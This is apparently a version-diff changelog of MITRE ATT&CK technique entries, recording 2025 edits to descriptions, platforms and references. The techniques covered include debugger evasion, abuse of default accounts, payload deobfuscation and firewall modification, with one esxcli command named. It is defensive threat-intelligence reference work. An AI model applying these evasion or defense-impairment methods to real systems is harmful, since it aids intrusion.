| reter](https://attack.mitre.org/techniques/T1059), such as [ | | and Scripting Interpreter](https://attack.mitre.org/techniq |
| cmd](https://attack.mitre.org/software/S0106) as well as a [ | | ues/T1059), such as [cmd](https://attack.mitre.org/software/ |
| Network Device CLI](https://attack.mitre.org/techniques/T105 | | S0106) as well as a [Network Device CLI](https://attack.mitr |
| 9/008), which have functionality to interact with the file s | | e.org/techniques/T1059/008), which have functionality to int |
| ystem to gather information.(Citation: show_run_config_cmd_c | | eract with the file system to gather information.(Citation: |
| isco) Adversaries may also use [Automated Collection](https: | | show_run_config_cmd_cisco) Adversaries may also use [Automat |
| //attack.mitre.org/techniques/T1119) on the local system. | | ed Collection](https://attack.mitre.org/techniques/T1119) on |
| | | the local system. |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Privileges to access certain files and directories'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-12 23:54:39.466000+00:00 | 2025-04-15 19:58:24.318000+00:00 |
| description | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
| Adversaries may search local system sources, such as file systems, configuration files, local databases, or virtual machine files, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
|
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1039] Data from Network Shared Drive
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Privileges to access network shared drive'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-11 21:06:07.690000+00:00 | 2025-04-16 20:37:18.881000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |
[T1025] Data from Removable Media
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Privileges to access removable media drive and files'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:30:50.936000+00:00 | 2025-04-15 19:58:10.837000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1102.001] Web Service: Dead Drop Resolver
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-26 23:12:30.499000+00:00 | 2025-04-15 19:59:22.651000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1622] Debugger Evasion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may employ various means to detect and avoid deb | t | Adversaries may employ various means to detect and avoid deb |
| uggers. Debuggers are typically used by defenders to trace a | | uggers. Debuggers are typically used by defenders to trace a |
| nd/or analyze the execution of potential malware payloads.(C | | nd/or analyze the execution of potential malware payloads.(C |
| itation: ProcessHacker Github) Debugger evasion may include | | itation: ProcessHacker Github) Debugger evasion may include |
| changing behaviors based on the results of the checks for t | | changing behaviors based on the results of the checks for t |
| he presence of artifacts indicative of a debugged environmen | | he presence of artifacts indicative of a debugged environmen |
| t. Similar to [Virtualization/Sandbox Evasion](https://attac | | t. Similar to [Virtualization/Sandbox Evasion](https://attac |
| k.mitre.org/techniques/T1497), if the adversary detects a de | | k.mitre.org/techniques/T1497), if the adversary detects a de |
| bugger, they may alter their malware to disengage from the v | | bugger, they may alter their malware to disengage from the v |
| ictim or conceal the core functions of the implant. They may | | ictim or conceal the core functions of the implant. They may |
| also search for debugger artifacts before dropping secondar | | also search for debugger artifacts before dropping secondar |
| y or additional payloads. Specific checks will vary based o | | y or additional payloads. Specific checks will vary based o |
| n the target and/or adversary, but may involve [Native API]( | | n the target and/or adversary. On Windows, this may involve |
| https://attack.mitre.org/techniques/T1106) function calls su | | [Native API](https://attack.mitre.org/techniques/T1106) func |
| ch as <code>IsDebuggerPresent()</code> and <code> NtQueryInf | | tion calls such as <code>IsDebuggerPresent()</code> and <cod |
| ormationProcess()</code>, or manually checking the <code>Bei | | e> NtQueryInformationProcess()</code>, or manually checking |
| ngDebugged</code> flag of the Process Environment Block (PEB | | the <code>BeingDebugged</code> flag of the Process Environme |
| ). Other checks for debugging artifacts may also seek to enu | | nt Block (PEB). On Linux, this may involve querying `/proc/s |
| merate hardware breakpoints, interrupt assembly opcodes, tim | | elf/status` for the `TracerPID` field, which indicates wheth |
| e checks, or measurements if exceptions are raised in the cu | | er or not the process is being traced by dynamic analysis to |
| rrent process (assuming a present debugger would “swallow” o | | ols.(Citation: Cado Security P2PInfect 2023)(Citation: Posit |
| r handle the potential error).(Citation: hasherezade debug)( | | ive Technologies Hellhounds 2023) Other checks for debugging |
| Citation: AlKhaser Debug)(Citation: vxunderground debug) Ad | | artifacts may also seek to enumerate hardware breakpoints, |
| versaries may use the information learned from these debugge | | interrupt assembly opcodes, time checks, or measurements if |
| r checks during automated discovery to shape follow-on behav | | exceptions are raised in the current process (assuming a pre |
| iors. Debuggers can also be evaded by detaching the process | | sent debugger would “swallow” or handle the potential error) |
| or flooding debug logs with meaningless data via messages pr | | .(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Cit |
| oduced by looping [Native API](https://attack.mitre.org/tech | | ation: vxunderground debug) Malware may also leverage Struc |
| niques/T1106) function calls such as <code>OutputDebugString | | tured Exception Handling (SEH) to detect debuggers by throwi |
| W()</code>.(Citation: wardle evilquest partii)(Citation: Che | | ng an exception and detecting whether the process is suspend |
| ckpoint Dridex Jan 2021) | | ed. SEH handles both hardware and software expectations, pro |
| | | viding control over the exceptions including support for deb |
| | | ugging. If a debugger is present, the program’s control will |
| | | be transferred to the debugger, and the execution of the co |
| | | de will be suspended. If the debugger is not present, contro |
| | | l will be transferred to the SEH handler, which will automat |
| | | ically handle the exception and allow the program’s executio |
| | | n to continue.(Citation: Apriorit) Adversaries may use the |
| | | information learned from these debugger checks during automa |
| | | ted discovery to shape follow-on behaviors. Debuggers can al |
| | | so be evaded by detaching the process or flooding debug logs |
| | | with meaningless data via messages produced by looping [Nat |
| | | ive API](https://attack.mitre.org/techniques/T1106) function |
| | | calls such as <code>OutputDebugStringW()</code>.(Citation: |
| | | wardle evilquest partii)(Citation: Checkpoint Dridex Jan 202 |
| | | 1) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-16 15:05:55.918000+00:00 | 2025-04-15 19:59:16.468000+00:00 |
| description | Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021) | Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary. On Windows, this may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). On Linux, this may involve querying `/proc/self/status` for the `TracerPID` field, which indicates whether or not the process is being traced by dynamic analysis tools.(Citation: Cado Security P2PInfect 2023)(Citation: Positive Technologies Hellhounds 2023) Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Malware may also leverage Structured Exception Handling (SEH) to detect debuggers by throwing an exception and detecting whether the process is suspended. SEH handles both hardware and software expectations, providing control over the exceptions including support for debugging. If a debugger is present, the program’s control will be transferred to the debugger, and the execution of the code will be suspended. If the debugger is not present, control will be transferred to the SEH handler, which will automatically handle the exception and allow the program’s execution to continue.(Citation: Apriorit)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021) |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Apriorit', 'description': 'Apriorit. (2024, June 4). Anti Debugging Protection Techniques with Examples. Retrieved March 4, 2025.', 'url': 'https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software'} |
| external_references | | {'source_name': 'Cado Security P2PInfect 2023', 'description': 'jbowen. (2023, December 4). P2Pinfect - New Variant Targets MIPS Devices. Retrieved March 18, 2025.', 'url': 'https://www.cadosecurity.com/blog/p2pinfect-new-variant-targets-mips-devices'} |
| external_references | | {'source_name': 'Positive Technologies Hellhounds 2023', 'description': 'PT Expert Security Center. (2023, November 29). Hellhounds: operation Lahat. Retrieved March 18, 2025.', 'url': 'https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat'} |
| x_mitre_contributors | | Joas Antonio dos Santos, @C0d3Cr4zy |
[T1491] Defacement
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-25 19:34:42.056000+00:00 | 2025-04-15 19:58:33.958000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1078.001] Valid Accounts: Default Accounts
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
|---|
| t | Adversaries may obtain and abuse credentials of a default ac | t | Adversaries may obtain and abuse credentials of a default ac |
| count as a means of gaining Initial Access, Persistence, Pri | | count as a means of gaining Initial Access, Persistence, Pri |
| vilege Escalation, or Defense Evasion. Default accounts are | | vilege Escalation, or Defense Evasion. Default accounts are |
| those that are built-into an OS, such as the Guest or Admini | | those that are built-into an OS, such as the Guest or Admini |
| strator accounts on Windows systems. Default accounts also i | | strator accounts on Windows systems. Default accounts also i |
| nclude default factory/provider set accounts on other types | | nclude default factory/provider set accounts on other types |
| of systems, software, or devices, including the root user ac | | of systems, software, or devices, including the root user ac |
| count in AWS and the default service account in Kubernetes.( | | count in AWS, the root user account in ESXi, and the default |
| Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS R | | service account in Kubernetes.(Citation: Microsoft Local Ac |
| oot User)(Citation: Threat Matrix for Kubernetes) Default a | | counts Feb 2019)(Citation: AWS Root User)(Citation: Threat M |
| ccounts are not limited to client machines, rather also incl | | atrix for Kubernetes) Default accounts are not limited to c |
| ude accounts that are preset for equipment such as network d | | lient machines; rather, they also include accounts that are |
| evices and computer applications whether they are internal, | | preset for equipment such as network devices and computer ap |
| open source, or commercial. Appliances that come preset with | | plications, whether they are internal, open source, or comme |
| a username and password combination pose a serious threat t | | rcial. Appliances that come preset with a username and passw |
| o organizations that do not change it post installation, as | | ord combination pose a serious threat to organizations that |
| they are easy targets for an adversary. Similarly, adversari | | do not change it post installation, as they are easy targets |
| es may also utilize publicly disclosed or stolen [Private Ke | | for an adversary. Similarly, adversaries may also utilize p |
| ys](https://attack.mitre.org/techniques/T1552/004) or creden | | ublicly disclosed or stolen [Private Keys](https://attack.mi |
| tial materials to legitimately connect to remote environment | | tre.org/techniques/T1552/004) or credential materials to leg |
| s via [Remote Services](https://attack.mitre.org/techniques/ | | itimately connect to remote environments via [Remote Service |
| T1021).(Citation: Metasploit SSH Module) | | s](https://attack.mitre.org/techniques/T1021).(Citation: Met |
| | | asploit SSH Module) Default accounts may be created on a sy |
| | | stem after initial setup by connecting or integrating it wit |
| | | h another application. For example, when an ESXi server is c |
| | | onnected to a vCenter server, a default privileged account c |
| | | alled `vpxuser` is created on the ESXi server. If a threat a |
| | | ctor is able to compromise this account’s credentials (for e |
| | | xample, via [Exploitation for Credential Access](https://att |
| | | ack.mitre.org/techniques/T1212) on the vCenter host), they w |
| | | ill then have access to the ESXi server.(Citation: Google Cl |
| | | oud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: |
| | | Pentera vCenter Information Disclosure) |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Janantha Marasinghe'] |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:35.610000+00:00 |
| description | Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) | Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)
Default accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure) |
| x_mitre_version | 1.4 | 1.5 |
| x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023', 'description': 'Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/'} |
| external_references | | {'source_name': 'Pentera vCenter Information Disclosure', 'description': 'Yuval Lazar. (2022, March 29). Mitigating VMware vCenter Information Disclosure. Retrieved March 26, 2025.', 'url': 'https://pentera.io/blog/information-disclosure-in-vmware-vcenter/'} |
| x_mitre_platforms | | ESXi |
[T1140] Deobfuscate/Decode Files or Information
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
|---|
| t | Adversaries may use [Obfuscated Files or Information](https: | t | Adversaries may use [Obfuscated Files or Information](https: |
| //attack.mitre.org/techniques/T1027) to hide artifacts of an | | //attack.mitre.org/techniques/T1027) to hide artifacts of an |
| intrusion from analysis. They may require separate mechanis | | intrusion from analysis. They may require separate mechanis |
| ms to decode or deobfuscate that information depending on ho | | ms to decode or deobfuscate that information depending on ho |
| w they intend to use it. Methods for doing that include buil | | w they intend to use it. Methods for doing that include buil |
| t-in functionality of malware or by using utilities present | | t-in functionality of malware or by using utilities present |
| on the system. One such example is the use of [certutil](ht | | on the system. One such example is the use of [certutil](ht |
| tps://attack.mitre.org/software/S0160) to decode a remote ac | | tps://attack.mitre.org/software/S0160) to decode a remote ac |
| cess tool portable executable file that has been hidden insi | | cess tool portable executable file that has been hidden insi |
| de a certificate file.(Citation: Malwarebytes Targeted Attac | | de a certificate file.(Citation: Malwarebytes Targeted Attac |
| k against Saudi Arabia) Another example is using the Windows | | k against Saudi Arabia) Another example is using the Windows |
| <code>copy /b</code> command to reassemble binary fragments | | <code>copy /b</code> or <code>type</code> command to reasse |
| into a malicious payload.(Citation: Carbon Black Obfuscatio | | mble binary fragments into a malicious payload.(Citation: Ca |
| n Sept 2016) Sometimes a user's action may be required to o | | rbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tai |
| pen it for deobfuscation or decryption as part of [User Exec | | nted Love 2023) Sometimes a user's action may be required t |
| ution](https://attack.mitre.org/techniques/T1204). The user | | o open it for deobfuscation or decryption as part of [User E |
| may also be required to input a password to open a password | | xecution](https://attack.mitre.org/techniques/T1204). The us |
| protected compressed/encrypted file that was provided by the | | er may also be required to input a password to open a passwo |
| adversary. (Citation: Volexity PowerDuke November 2016) | | rd protected compressed/encrypted file that was provided by |
| | | the adversary.(Citation: Volexity PowerDuke November 2016) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host Intrusion Prevention Systems', 'Signature-based Detection', 'Network Intrusion Detection System'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 19:28:18.334000+00:00 | 2025-04-15 19:58:24.400000+00:00 |
| description | Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) | Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b or type command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Sentinel One Tainted Love 2023', 'description': 'Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen. (2023, March 23). Operation Tainted Love | Chinese APTs Target Telcos in New Attacks. Retrieved March 18, 2025.', 'url': 'https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/'} |
| x_mitre_contributors | | Cristóbal Martínez Martín |
| x_mitre_platforms | | ESXi |
[T1610] Deploy Container
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:06:17.124000+00:00 | 2025-04-15 19:58:33.230000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1006] Direct Volume Access
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['File monitoring', 'File system access controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:25:24.480000+00:00 | 2025-04-15 19:58:05.272000+00:00 |
| x_mitre_version | 2.2 | 2.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Network Devices |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1600.002] Weaken Encryption: Disable Crypto Hardware
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-21 22:37:48.503000+00:00 | 2025-04-15 19:58:45.787000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1562.002] Impair Defenses: Disable Windows Event Logging
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Log analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-18 22:33:57.556000+00:00 | 2025-04-16 20:37:17.061000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
[T1562.004] Impair Defenses: Disable or Modify System Firewall
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may disable or modify system firewalls in order | t | Adversaries may disable or modify system firewalls in order |
| to bypass controls limiting network usage. Changes could be | | to bypass controls limiting network usage. Changes could be |
| disabling the entire mechanism as well as adding, deleting, | | disabling the entire mechanism as well as adding, deleting, |
| or modifying particular rules. This can be done numerous way | | or modifying particular rules. This can be done numerous way |
| s depending on the operating system, including via command-l | | s depending on the operating system, including via command-l |
| ine, editing Windows Registry keys, and Windows Control Pane | | ine, editing Windows Registry keys, and Windows Control Pane |
| l. Modifying or disabling a system firewall may enable adve | | l. Modifying or disabling a system firewall may enable adve |
| rsary C2 communications, lateral movement, and/or data exfil | | rsary C2 communications, lateral movement, and/or data exfil |
| tration that would otherwise not be allowed. For example, ad | | tration that would otherwise not be allowed. For example, ad |
| versaries may add a new firewall rule for a well-known proto | | versaries may add a new firewall rule for a well-known proto |
| col (such as RDP) using a non-traditional and potentially le | | col (such as RDP) using a non-traditional and potentially le |
| ss securitized port (i.e. [Non-Standard Port](https://attack | | ss securitized port (i.e. [Non-Standard Port](https://attack |
| .mitre.org/techniques/T1571)).(Citation: change_rdp_port_con | | .mitre.org/techniques/T1571)).(Citation: change_rdp_port_con |
| ti) Adversaries may also modify host networking settings th | | ti) Adversaries may also modify host networking settings th |
| at indirectly manipulate system firewalls, such as interface | | at indirectly manipulate system firewalls, such as interface |
| bandwidth or network connection request thresholds.(Citatio | | bandwidth or network connection request thresholds.(Citatio |
| n: Huntress BlackCat) Settings related to enabling abuse of | | n: Huntress BlackCat) Settings related to enabling abuse of |
| various [Remote Services](https://attack.mitre.org/technique | | various [Remote Services](https://attack.mitre.org/technique |
| s/T1021) may also indirectly modify firewall rules. | | s/T1021) may also indirectly modify firewall rules. In ESXi |
| | | , firewall rules may be modified directly via the esxcli com |
| | | mand line interface (e.g., via `esxcli network firewall set` |
| | | ) or via the vCenter user interface.(Citation: Trellix Rnaso |
| | | mhouse 2024)(Citation: Broadcom ESXi Firewall) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Firewall'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:37:57.867000+00:00 | 2025-04-15 19:58:31.395000+00:00 |
| description | Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules. | Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.
In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall) |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Broadcom ESXi Firewall', 'description': 'Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025.', 'url': 'https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html'} |
| external_references | | {'source_name': 'Trellix Rnasomhouse 2024', 'description': 'Pham Duy Phuc, Max Kersten, Noël Keijzer, and Michaël Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.', 'url': 'https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/'} |
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1562.001] Impair Defenses: Disable or Modify Tools
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | Adversaries may modify and/or disable security tools to avoi | t | Adversaries may modify and/or disable security tools to avoi |
| d possible detection of their malware/tools and activities. | | d possible detection of their malware/tools and activities. |
| This may take many forms, such as killing security software | | This may take many forms, such as killing security software |
